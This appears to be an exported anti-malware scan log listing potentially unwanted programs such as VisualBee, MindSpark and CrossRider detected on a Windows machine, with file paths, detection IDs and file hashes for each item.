PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Y335_smart.jpg, No Action By User, 169, 175250, , , , , 40CB5388995DD9D34D5C54A43B1B1F10, 8EBF36ABC4B196E9D81313E6A85D1433E46280CB7E2CEE68A329E48479A82F20
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Y335_text.jpg, No Action By User, 169, 175250, , , , , 204C9E19B165DDE23A770542EEDB7FEB, 1E8BF712E785B8AE160311B5BF9D383E92C820421FC8BDE76D1F6CCD64F7E462
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Y335_thumb.jpg, No Action By User, 169, 175250, , , , , 9F7E22CD76ED43194073FFC578E6E269, F2075E206058F600196E8737CB09EC46CE0F97A8AB58F6948D6A20B500889140
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Y336_smart.jpg, No Action By User, 169, 175250, , , , , 77BC94964031EDF72BC994A5975368DD, 5091DB156AA5B6C32677FD9D56C2C5EEF0C2C074FF1BB5AD50C0BA354A271F9E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Y336_text.jpg, No Action By User, 169, 175250, , , , , 0EDEA7790E61D6886D4102C08D20A758, E145C55AF7FF12F876C18930C7AB630F08D0828C63B51AA53BAD0AFFFE20900D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Y336_thumb.jpg, No Action By User, 169, 175250, , , , , 88EF40127040B9B513F2C830CFC50C63, CB2160BBF3DC2E9B750C16F6ED218B2237E84CC8FE8DBA623B4721724BC5C4E1
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\checksum.vdb, No Action By User, 169, 175250, , , , , E4560913685AEE6A769E9B018CBFBC69, 4975678AC1F2E763C2FE383C811F915820F24174CB45E94EDB0FD0E031A66CB4
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\Layouts.vdb, No Action By User, 169, 175250, , , , , 9A14FAB061316B5453AFFF50090A985A, F63C6A0A618ED6835FE50AE5BA7CE8DA693786CEE5FF9AAF41758A00C58B7824
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\LayoutsSchema.vdb, No Action By User, 169, 175250, , , , , A0C999C7F36C649A973D326AD2E5F6D2, 062F880FC58B03CE84491C0D846FC69474791B501C95EB5660A31971175F3A54
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\PublicImages.vdb, No Action By User, 169, 175250, , , , , D31EBFBCC59244E702A78DB192EB6D26, 11B7F7D837EE57E031FA3266536B55BA379BDDB32F6DB4E2236CAF8A1EE1A06F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\PublicImagesKeywords.vdb, No Action By User, 169, 175250, , , , , , 
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\PublicImagesKeywordsSchema.vdb, No Action By User, 169, 175250, , , , , 6B24F51F21A15B67218015863D03FA3D, DAF89D2E8C70A2DFD3A135D1F180BC780267C97509279321E77279FFBE4D9747
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\PublicImagesSchema.vdb, No Action By User, 169, 175250, , , , , 7F2DD72C4A5F4F58EEDE457F52AB7EB1, 95C4645653A49D2E4E6706C5768D1FE004CC8388BB0FA053F35CC01A1F2A1434
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\Schemes.vdb, No Action By User, 169, 175250, , , , , 0BADE93C90934BC3F89D6D076EAE4357, 894F4FACFE82F4EAF1378E9FB3E8A33DC6F2246072489FD1A58CE24DC6EE1518
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\SchemesSchema.vdb, No Action By User, 169, 175250, , , , , FF1BD07DF89989BE9C281811ECD84DFA, 63D5F823560D188EFAD12431EC888620AD2568C948DB393BB9CB5791EF9E8017
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\Slides.vdb, No Action By User, 169, 175250, , , , , EB27CAB3CAB5DD314D71FCF2F2B80E3F, EC885D06B9F744520D89B5270357F19120D5806569A5E44C0593DEECF81FE0E4
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\SlidesKeywords.vdb, No Action By User, 169, 175250, , , , , 625A5EB5758BB19F6D8C93312A1C3031, BC627A4C113D9584F1E77690A40A958B3DC4CEC7CFD5FE82FC7496E49DE2F191
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\SlidesKeywordsSchema.vdb, No Action By User, 169, 175250, , , , , 1AF7758D6E862E2934BB128AE191C383, 40C5E06DAC0B1ECA8F8E2D0483BC12C8B37F9F323BD07DA9BBC2779443253F06
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\LocalDB\SlidesSchema.vdb, No Action By User, 169, 175250, , , , , 6C90D67353699163A656AD7DB4F01BF0, 036BFC32FDF7CB73B635926FCACF13FE5D204C36E2F79D20C244CDAC42EA6042
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\adj.exc, No Action By User, 169, 175251, , , , , BA307D432C5A159D4401F61CE170B178, 94B099CBBC322C7F1A0366CB06ED245DE7940C060A69BFF267F8B7EC3F3233C8
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\adv.exc, No Action By User, 169, 175251, , , , , C0D9112AE92A3CE3A149541C16C0386A, E7291461B629ABFE63301BBE1998CEE09FD575ED7107ABD7EA9763ADB05BF0A8
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\cntlist, No Action By User, 169, 175251, , , , , DDEE9CC7602D1D9C947BCA73AE7C2BDA, 6C8109D0BCC97B5F8E6B222A6600B01216F9F48A61297B4D191804138A9E3294
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\cntlist.rev, No Action By User, 169, 175251, , , , , EDFB618272CDD74157FC58662CEB5D76, B2A79696D963E2C78ACD59B68FD7EA50C8B9AB36B1866FB5EB203276FF3C22E4
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\cygwin1.dll, No Action By User, 169, 175251, , , , , E8CD5A2BA5D93ACCE6C28C26BF5717FB, 348CED93CEBE7A6942DA66AEDDF0E3614E1161F42CC018882E4D9B173E6C41DA
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\data.adj, No Action By User, 169, 175251, , , , , 77C23B6F248BE5C402CFE6029F03E453, 0B6C86E0D7F6832231FBC7774583A5FB87A5F9D27B8D40A9A618FA35CADD032B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\data.adv, No Action By User, 169, 175251, , , , , F40AF79405E05CE984745E0C09719BE9, EF8EA6090E20D79BF4F902643B64A0E7E917F25AF7B419C32E32FC6D80881F78
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\data.noun, No Action By User, 169, 175251, , , , , D592BD83181C04D43B7A8F08FB44C51C, 4FFB1525D25773E8E52DED04E45E20726D56F793917B322AB2516FB278CE905F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\data.verb, No Action By User, 169, 175251, , , , , 1338B3FAD9FE4A16357833569A4F5577, 069E457551CC78C7E136FFAECC96353414ADBB0AFFE70F7045351228A4ABC37E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\english.model, No Action By User, 169, 175251, , , , , F666DC61F7CBF3CC69366010A4E1F29F, 97C02AAD6C04BCFB786F96CD628B0DB8BFCE57E1C5B89EA9A18620B8D482DB52
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\frames.vrb, No Action By User, 169, 175251, , , , , FA5C7D42EC3214777011EABD13F34BC9, E7EDC9055E1FAFB77622E1DF54CB22DA82BF5853527687C2B1409ACD9C0DC49B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\hunpos-tag.exe, No Action By User, 169, 175251, , , , , 0719A470FFB3E0088D158549A87A5647, 6F2F3CC66EBB657B22CAB32C1280F4A4D32AF4E689BF02A18243DE144EB1AD24
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\index.adv, No Action By User, 169, 175251, , , , , F5AFBB3AEF35A44C307AFD71EF30CBA5, 1C48EFE5DD517E8986F41A13F5E668D7D83A875D7A2F989528648EDEE082BF7D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\index.noun, No Action By User, 169, 175251, , , , , E8F9D23340AB7EE220AEA4070787C3C9, 943A675E31D9FC0D9211BD4795D4F8ACFE820B92A80020F8F17D6250494FE157
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\index.sense, No Action By User, 169, 175251, , , , , 475B29CE5D7184B07D2DC6BEE8E4F528, 34E034B8BC0911B5DCDF8C813701D7F53F4A303E1867EA301FF9B9F238A3CBA8
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\index.verb, No Action By User, 169, 175251, , , , , 9D4CF73C4F5E31A79D14A5AEF32032B8, D330A5BBF7A0523A208FCD931D02D66E65780ED67B34A2B574B4489B2BF4D466
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\log.grind.2.1, No Action By User, 169, 175251, , , , , FFD3C1BB91E802EDEC73560943B8A8F4, 49EB9B1A76C5CCA6A7E9A58528B22A46A928D26256457084C60F20B19F44B5D2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\noun.exc, No Action By User, 169, 175251, , , , , 2BCA28CFA5D95AD82830200945152C7D, 5A7DD1C656EB4D43F28937FDB3B65CFC4E09BF309E9EA0BB60C81F6F9DA81A51
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\sentidx.vrb, No Action By User, 169, 175251, , , , , 4984A7693EEE1749F8FF2FF82D5EB659, B20D7E26B87F4743340F18858AE182F91901C5404F9AC0538ACDF5080CF2FB09
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\sents.vrb, No Action By User, 169, 175251, , , , , 191515FFBA85D4461D37F93059DE2840, 6FB59507C96C4AEB267E016CE4A654A1791A438815DE98C52E7975DF20DB15C9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\verb.exc, No Action By User, 169, 175251, , , , , 5B682D41B7793761EB6C7E7CC275E9C7, A5FD07BA640AAE3D15C227F72C93A80CA6DA3AE0F5998D0F832A6F7333BFAD6B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Dic-Eng\verb.Framestext, No Action By User, 169, 175251, , , , , E8CAD2CB552216DF135852CBA4697B68, 2A6A11D6E431261100CE90C71932051B3DD0A07B2BB41DD0E48EE4FCFC3BE799
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\GuideFiles\License.rtf, No Action By User, 169, 175251, , , , , ADBAE8185E66B640652E7F6A0C04A76E, 39236DFDA58DEA1713796EBB2768604ABD309388DC5FD40243FF3A4D072C29EF
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\GuideFiles\SelectSlidesGuide.rtf, No Action By User, 169, 175251, , , , , 70B24E68D4CF22E218314DEC01BB5BFC, 9E4EE1F0812454F1367F3BE44F09AAF3933806366B68EDB0FB6EAF48AA443F9D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\ClientComServices.dll, No Action By User, 169, 175251, , , , , 4CE51848ADB3BA7C0F435B7C549E899E, 1C2AFDDD7198745C1AAF6B1C1716CBF010344AFEF78C148D29F59968BC1EB640
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\ClientSoftwareUpdate.dll, No Action By User, 169, 175251, , , , , 57F7BF43903E1A857C89C4C21FDF89BB, B5CA66EA69887332993D2A68CDC466D995E64368870DB895922AE3A90C6CEC9B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\ClientUtilities.dll, No Action By User, 169, 175251, , , , , 542546874FEBEE4DCA6F42D9B4EB989A, E47D3F02C0CC58C88D781B08C66B35FCF5F4E41376DD7341141EE618B5B8D75D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Domain.dll, No Action By User, 169, 175251, , , , , 3A4EC90112979A06DFE93401A574781F, 7B159FA1FF62247FB22DAAE2DA4D0784BE0D4540BC68569383F0031BF28528FE
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\IComService.dll, No Action By User, 169, 175251, , , , , 5F4486A39A32CA700EF5E8F67D5BF319, 4F49893185D72B39212DE0390EB92545CCAF4A9630C5D1488AB746E22B35F3BF
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\IDBService.dll, No Action By User, 169, 175251, , , , , B0327E8CB5057429D4FC72BCE597AB72, D28691BE726FB0AE927D74105EA2A068A1DC7622377CC15555153DBD9A4175D7
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\Ionic.Zip.dll, No Action By User, 169, 175251, , , , , 746F909970274C71991F63325BA3AB4E, 5C0449B8A9B65F36CB6A66C1AC9379F8F62A75DFCCFDA67FE959563177B3C5B0
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\ISwUpdateService.dll, No Action By User, 169, 175251, , , , , C532DC771BD0A45764077E880A82EEE6, A98CAE147C8891F43F6F6C0180271A22DBEA76891CB7668E94F584BF024E8DC5
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Advisor.dll, No Action By User, 169, 175251, , , , , 5729CAD07EF7A424E96B55D5E133B4B8, 684E1EF3D9E717F0EAB9C14CEF599D228200B09377C7C9B849302C99FE37AFC9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Analysis.dll, No Action By User, 169, 175251, , , , , 4EBDBD992D75F4120ED05E0738C87640, FC860FFFEB02EA2793ABE55EDBEB6DBD445B7E4E8C0542BF28CF4532905A40F9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Analyzer.dll, No Action By User, 169, 175251, , , , , 45D3DFB0DB289127C412DBAE35DB831C, BD6102E53B3E28D2A1809E7EA72068D9527BBEA508C9C3C1FA29F75008364909
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Builder.dll, No Action By User, 169, 175251, , , , , DA90B99EBAE6BFE235066BFD224DEA32, 78FFEA40FCAB620FAAB098C0E5F2316801C8FFDB180DC586A04CDC3088805F17
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Cleaner.dll, No Action By User, 169, 175251, , , , , 3DC84CC1AFBD55D82188276D9191AE68, DD1850BF788544E041410C8D66C5F513F392D417D2362AE9615241E6C3048803
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Database.dll, No Action By User, 169, 175251, , , , , 4ECFD3BBE7C977716AF4DD74577137C7, CD7069E1DDF9E3B1CC88E85E05F11459878EEA418D73F21FD00A4E06D974E56C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Design.dll, No Action By User, 169, 175251, , , , , AC1FC0389AC8F05C6DBEF60286AED860, 36978961DAFDC1C782FEAD2F4EA65F5EF60CBF74AAB1FC53811D548B9C54BC5B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Designer.dll, No Action By User, 169, 175251, , , , , 17DC0BD3DE3C1EF7369D8BDB6EAD5C13, 7435C8A9B2731DBE6E9D7FEB905C7FEA24316C6B02268D4F0FBCE700DFB46BF7
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Downloader.dll, No Action By User, 169, 175251, , , , , DB55152FEE12D70CAC2BBC37885365C8, B1660FAF6B4FAA0AB3E3D3DC862583E4BEAB22C1EAA5CAAAA885BEFC8293D720
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Engine.dll, No Action By User, 169, 175251, , , , , E9C0D7A5299C7BE15AAA45CE04A18E4C, 3DFEA699648A8703563B0BF676A2F27A94D7F30AB179554F994C368F25EB9569
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_EngineGlobals.dll, No Action By User, 169, 175251, , , , , 56F176ED47B9A714A095A572F5F7F576, E7B616A250241C5C818468F6792C22FBDF55E1744AB18A97A23BD99E8A80AB45
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Extractor.dll, No Action By User, 169, 175251, , , , , 3A4B0232A3C21C813075D2299B11469D, 13A9A6A3CF96F8971B1FB2D1D9B9C3492A569F4EB5FEDC531BC1BF91FEEE5298
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_ExtraGlobals.dll, No Action By User, 169, 175251, , , , , F95BD7202CE8EF92848C4E22E79F464B, 88272E9BD4DBEE711C10986EA54BA85ADE9570A1825B63968A0D1ED0F7F564AA
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_HunposHelper.dll, No Action By User, 169, 175251, , , , , AF9E8C85870D26861CDF3E2DC72AF878, A15DC4884E5D1860BD62033B7346BA2C4F70D4C8397E3B98305CDBFD1BFE2AE5
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_ImageManipulator.dll, No Action By User, 169, 175251, , , , , 76B418EBBE9D220318DF1B751661B25A, A6936722EA132442FAD7626ECBD479426B53DFC19FFE043AFCE4A6E3E74BD1E1
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_MessageForm.dll, No Action By User, 169, 175251, , , , , 0DEE3B27AE316F1D0B3170708DFBC170, A3004E53BBC1651D30BB1F357EC66E2F9D0EFA38AAE03439B4CF43335D9BC009
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Normalizer.dll, No Action By User, 169, 175251, , , , , 0AF365D0514FC3799A6DED1AC158387F, 0C077492A6CF45644E8424D5B406BF81B289CA27CFA96DC62E341597D8AD1C58
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Presentation.dll, No Action By User, 169, 175251, , , , , B31D43AC2283084D73432D5C2EF7607E, DDE4EBF0D43F88E1D2D65C503A1CD5FE600FAFA6804E291D61AB62B28C1793FE
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_SendLogFile.dll, No Action By User, 169, 175251, , , , , C5D151B6987F29F71488EA6E7AFF5410, 1C3C57F2C330B2A4B2A5917FB6B7A45C1CF28B4ACD8735C1D6B596C4B1550D67
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_Share.dll, No Action By User, 169, 175251, , , , , 09A735E9C2225196263F5480E607FCD8, 82068A47CCE73B78719315E3D7F2D7F10A8DEA13A1BCE3E2447FEE99EC531969
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_SmartArtLib.dll, No Action By User, 169, 175251, , , , , 9426B14B5F41B5775ADCFA31F389BAA2, EAE1189003A75B072C7AD56F4B65C3C8849BA5B5A550DD1241CD8410E75679B9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_WordNetHelper.dll, No Action By User, 169, 175251, , , , , 1C460AE5977DE3790C4691A9BD438FC5, 584B576487ED0F4E3874CD84412B882910F9F6A54BA71F83B6902DBFE91664F9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\N_ZoomPanel.dll, No Action By User, 169, 175251, , , , , C85BBC6E4A9706BE537A12F80A61C58A, FAEAD966B400B19CD4AA7D5C76496A30E4FBE18E661E4E53C936A10DA75064E5
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\SlideShareAPI.dll, No Action By User, 169, 175251, , , , , B45A303276878FA755FB5E9179C3B041, B8AF32334E7F5D85978AEAAB98D008E589D40C937C3589DCEE5BDA1CF2CE7B4F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\uninst.exe, No Action By User, 169, 175251, , , , , 0DC67CC72EAEF033BEEE2D10170C69D2, 2F167F8057F8FDC302852042A893BE786AC347EF2D8E3653DAF20A787C52C5DD
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeAbout.dll, No Action By User, 169, 175251, , , , , FCEDED6A309694EAD888F835EC30A073, 0C1D7F1C4A728D99D5CF8961F396C726868D6E7851CEF3983C17721072A3A088
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeAccount.dll, No Action By User, 169, 175251, , , , , 622C2DB44A900727C66B60BF47D63780, 725C540A9504F8C184F839863BC72FC42B2CE56BC8F33BA13681FC6CFBF555D2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeClient.dll, No Action By User, 169, 175251, , , , , C0151C4751CF7D4FEF37FB99A0143B49, 618D0573AEA683C495FF1D1A6E8DAA7BFF56D7B74EFC2339105CDAE3EBAB51FD
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeClient.dll.config, No Action By User, 169, 175251, , , , , 9E26DC1F8044F740259FFE9E638A92A4, 4926F50BF6A4AAD0CDBE3EDE463CBF9904E38910452DAB8500CED4EEDDD52169
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeClient.dll.manifest, No Action By User, 169, 175251, , , , , 62826C0AA3FE4BFE377E78C0EA94177E, 22453D713DB1630D5E561B7FAD1B55121F3DE6B13A26C2901DAA2BEF07C0B61E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeClient.vsto, No Action By User, 169, 175251, , , , , 02ED09C4C41570480B80BE5153F32C2D, 31BD5B7A829E28551A60AD293CF734A286F59577958E3D788A572B4AE04E2CA7
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeEnhance.dll, No Action By User, 169, 175251, , , , , 9A77E2CE9D205C3843860F722CCCAFFD, 587F58E5B20C6027ABF9B2BCF91AA8C3FC9DC058F411F912B8D89EC40AC73B0C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeLibrary.dll, No Action By User, 169, 175251, , , , , 7116C034B74CDC3FBD13888F8C9430A7, E87D5847B8338D0A5ACF2E625E97DB1C82689B56C76E106FDAD0CD6209460756
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeMyLogo.dll, No Action By User, 169, 175251, , , , , B2432F3653E7BB1E5C87D7CE925AEB3E, 9740774AFBF27BFCE169E5755B0DE605BE54437217A8AB8276B412A0EA1DC536
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\VBeeWebSearch.dll, No Action By User, 169, 175251, , , , , 13D0805108947BC89AF58C046642C31B, 877987F8961C36F9364CECE3AE4999EC73269A88B176037473E5FA5D1BCEFD67
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeExe\WordNetClasses.dll, No Action By User, 169, 175251, , , , , 0A1F7875AE15D2D8CDBDBC4E70A2E1D8, EE13BC4BF241C3109D36D885BB27927B5FEB71F59A22822C80E0E9B5D7A1AD69
PUP.Optional.MySearchDial, C:\WINDOWS\TASKS\MYSEARCHDIAL.JOB, No Action By User, 108, 241073, 1.0.49973, , ame, , 96CD99DF72EC8B249042554879DEEFAD, 37800EC6DD45A87FB2E095493636DD8E3A2FC1117DC5B429737A59B901B5B486
PUP.Optional.OptimizerPro, C:\USERS\MARILYN\DOCUMENTS\OPTIMIZER PRO\COOKIESEXCEPTION.TXT, No Action By User, 1043, 241439, 1.0.49973, , ame, , 753BF471BA213ED5ABDFD445001AF3AD, 18C0C0BBED31581A40E4D10BC0D3F497DDE25F8AA9C19B6D98D0CDDD6A3F42F6
PUP.Optional.CrossRider.Generic, C:\WINDOWS\TASKS\Information-firefoxinstaller.job, No Action By User, 1950, 259451, 1.0.49973, , ame, , 9A30784B7A5FDBDF88302B91EA5020A0, 80FDD9707B279571312343F31E5129F2FD00DEC70BF0BADF80116589475D9B1F
PUP.Optional.CrossRider.Generic, C:\WINDOWS\TASKS\Information-codedownloader.job, No Action By User, 1950, 259450, 1.0.49973, , ame, , B7E2D1F088564EB6836FBEA2CE4B0EF4, AFC4D96931A7FA9EF62AB43FEE6319BE70DDBA93CAB664E81BA8C03C14B6D987
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10112936, No Action By User, 764, 178422, , , , , D702420ED367848550F4EE5F5349942F, F67B8663E1E8D2ADB94456119C7699DA368155CACF097F1E61BC8BB70EED9509
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10113B4F, No Action By User, 764, 178422, , , , , 356F5C11F4A1827A3B1F2A3FBD40AF1B, 14552970461BF9F2F51932D034DD554B04BF1777557EF773FF1426720C84E0CE
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10113C77.bmp, No Action By User, 764, 178422, , , , , 4594F00647C320F703B88B0C3A53FA64, EA4E20F71F81D20FA0C656A0CCC94794A23FAFF6CA2855F209B4B43EC6B0BA63
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10113F06.bmp, No Action By User, 764, 178422, , , , , 5E52163916D982FA55E8406F6CE876F2, 1104AE27DEDA59CE5487F26C196B49F710441658A10CD317FE94A25216362F5F
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10113FC2.bmp, No Action By User, 764, 178422, , , , , BFF29672300AEB9C06E453B92FD81133, E1DBA9EE87646C5FD2C532C20DC9660B28415A17A9E43CC13E704F2C5A25AFAD
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\101140AC.bmp, No Action By User, 764, 178422, , , , , E7E7FB7F00A2BE1A9ECCAFEDC858369C, FEEF53D8184ABBBF2F1C51AB90E718B4E01BBED218080DDFCE46879CD6E405DA
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\101142CE.bmp, No Action By User, 764, 178422, , , , , 495AC8D36181BE77371BACCC50A82D84, F243CF138E7BC2D2211C87AB08CE67BB1CC83A1508734909ECA095A278C8892E
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10114398.bmp, No Action By User, 764, 178422, , , , , 339E578E20BA037983347938ADCB69A6, 0BE38D02AB1073BB3557F56C689DFB9AF91C309E7C20A92403845188B566681E
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10114434.bmp, No Action By User, 764, 178422, , , , , D71AAC4347FF93BF84C30FC4DBE58B59, D4AC3633B04ADDEAFF34E4A4B73E4CA3651B1AE570D0C2469D0190FDE0E353E3
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\1011454D.bmp, No Action By User, 764, 178422, , , , , 7F9EA572F26DECABD9361CAA411EE1E8, 012FC59CD412CF4C28AE132A9D1B11D94923293D3830873B5E7B52D52F538D16
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\1011513F.bmp, No Action By User, 764, 178422, , , , , F26299177F48288C1A7B518ABD5603C1, 3610A00F4531646BB06FF26300E082AD2C19C98042D09813EBB60BBF644D8BEE
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\101154D7.bmp, No Action By User, 764, 178422, , , , , 81744A73A1A488730DAD5627709C9990, 07B438E28A0CC48BD1AEF91317373F20864E0426A06919DB142EC3C5130C5D99
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10115A05.bmp, No Action By User, 764, 178422, , , , , 282A8BADFA69EA2E9B0488C74BF1D5D5, 2D6425E52E9E42FCB96E1BEA4B9165C8F174ECC8922EFF628F892275B9CABBCE
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\MapsGalaxy_39\bar\Cache\10115CB4.jhtml, No Action By User, 764, 178422, , , , , A255D29F69C32FB3CD02DB41B63F48AC, 700B18EDC64946A18FFE0E07456CCFC5CB32F9D2A1A5F496898E57E6316347CD
